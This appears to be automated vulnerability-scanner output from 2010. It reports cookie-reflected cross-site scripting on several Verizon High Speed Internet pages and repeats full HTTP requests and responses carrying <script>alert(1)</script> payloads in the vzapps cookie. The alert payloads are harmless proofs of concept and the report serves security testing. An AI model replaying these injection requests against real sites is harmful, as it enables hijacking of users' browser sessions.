Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 91146 Expires: Sat, 20 Nov 2010 03:14:14 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:14:14 GMT Connection: close Set-Cookie: ContextInfo_State=TX668ed'><script>alert(1)</script>bf2d4cd51f6; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <input type='hidden' id='locationInfo' value='TX668ED'><SCRIPT>ALERT(1)</SCRIPT>BF2D4CD51F6 ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 5360b<script>alert(1)</script>87b39a50ac5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92738 Expires: Sat, 20 Nov 2010 03:14:29 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:14:29 GMT Connection: close Set-Cookie: ContextInfo_State=TX5360b<script>alert(1)</script>87b39a50ac5; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX5360B<SCRIPT>ALERT(1)</SCRIPT>87B39A50AC5 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 85766<script>alert(1)</script>8553ba7b684 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX85766<script>alert(1)</script>8553ba7b684; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92738 Expires: Sat, 20 Nov 2010 00:12:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:22 GMT Connection: close Set-Cookie: ContextInfo_State=TX85766<script>alert(1)</script>8553ba7b684; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX85766<SCRIPT>ALERT(1)</SCRIPT>8553BA7B684 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5b24'><script>alert(1)</script>d2df3510f80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc5b24'><script>alert(1)</script>d2df3510f80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92742 Expires: Sat, 20 Nov 2010 00:12:19 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:19 GMT Connection: close Set-Cookie: ContextInfo_State=TXc5b24'><script>alert(1)</script>d2df3510f80; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Features & Services </title><meta name="keywords" content="verizon high speed internet features, verizon features ...[SNIP]... <input type='hidden' id='locationInfo' value='TXC5B24'><SCRIPT>ALERT(1)</SCRIPT>D2DF3510F80 ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 790ec<script>alert(1)</script>1fb2881387e was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8e301'><script>alert(1)</script>715a473175c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1bbd6'><script>alert(1)</script>c865fc14b77 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e9fda<script>alert(1)</script>0b8d7546ca4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload d477a<script>alert(1)</script>4e4f8e6dbe8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXd477a<script>alert(1)</script>4e4f8e6dbe8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68018 Expires: Sat, 20 Nov 2010 00:12:31 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:31 GMT Connection: close Set-Cookie: ContextInfo_State=TXd477a<script>alert(1)</script>4e4f8e6dbe8; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1327c'><script>alert(1)</script>eb0b45a8082 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1327c'><script>alert(1)</script>eb0b45a8082; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68022 Expires: Sat, 20 Nov 2010 00:11:52 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:52 GMT Connection: close Set-Cookie: ContextInfo_State=TX1327c'><script>alert(1)</script>eb0b45a8082; path=/
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ed63'><script>alert(1)</script>aba8646129c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 56a2d<script>alert(1)</script>eac0704937d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 98e16<script>alert(1)</script>9d0879de158 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX98e16<script>alert(1)</script>9d0879de158; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68015 Expires: Sat, 20 Nov 2010 00:09:38 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:38 GMT Connection: close Set-Cookie: ContextInfo_State=TX98e16<script>alert(1)</script>9d0879de158; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0257'><script>alert(1)</script>be1613d7d65 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXc0257'><script>alert(1)</script>be1613d7d65; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68019 Expires: Sat, 20 Nov 2010 00:09:22 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:22 GMT Connection: close Set-Cookie: ContextInfo_State=TXc0257'><script>alert(1)</script>be1613d7d65; path=/
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 640aa<script>alert(1)</script>383bb65ea2f was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6487d'><script>alert(1)</script>b45a269dda5 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5315'><script>alert(1)</script>2c1f456c2c6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86aaa<script>alert(1)</script>b944052706a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e0ce9'><script>alert(1)</script>6ae6011d9f2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 58000 Expires: Sat, 20 Nov 2010 00:09:16 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:16 GMT Connection: close Set-Cookie: ContextInfo_State=TXe0ce9'><script>alert(1)</script>6ae6011d9f2; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1afe5<script>alert(1)</script>103649a90a9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1afe5<script>alert(1)</script>103649a90a9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 57996 Expires: Sat, 20 Nov 2010 00:09:18 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:18 GMT Connection: close Set-Cookie: ContextInfo_State=TX1afe5<script>alert(1)</script>103649a90a9; path=/
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload e1d4d<script>alert(1)</script>f1881c1417d was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 94418 Expires: Sat, 20 Nov 2010 03:14:48 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 03:14:48 GMT Connection: close Set-Cookie: ContextInfo_State=TXe1d4d<script>alert(1)</script>f1881c1417d; path=/ Set-Cookie: ContextInfo_Language=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Plans </title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXE1D4D<SCRIPT>ALERT(1)</SCRIPT>F1881C1417D </DIV> ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 136fa'><script>alert(1)</script>a9a22c4e567 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 50211<script>alert(1)</script>b0f40fbc4a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX50211<script>alert(1)</script>b0f40fbc4a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 92840 Expires: Sat, 20 Nov 2010 00:13:42 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:42 GMT Connection: close Set-Cookie: ContextInfo_State=TX50211<script>alert(1)</script>b0f40fbc4a; path=/ Set-Cookie: ContextInfo_Language=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Plans </title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX50211<SCRIPT>ALERT(1)</SCRIPT>B0F40FBC4A </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 134f1'><script>alert(1)</script>ef0109a6fac was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Plans/Plans.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX134f1'><script>alert(1)</script>ef0109a6fac; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 94442 Expires: Sat, 20 Nov 2010 00:13:32 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:32 GMT Connection: close Set-Cookie: ContextInfo_State=TX134f1'><script>alert(1)</script>ef0109a6fac; path=/ Set-Cookie: ContextInfo_Language=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: Plans </title><meta name="keywords" content="verizon high speed internet plans, verizon high speed internet prices, v ...[SNIP]... <input type='hidden' id='locationInfo' value='TX134F1'><SCRIPT>ALERT(1)</SCRIPT>EF0109A6FAC ' /> ...[SNIP]...
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d1ec'><script>alert(1)</script>5088e34c333 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dd0c6<script>alert(1)</script>63779292418 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
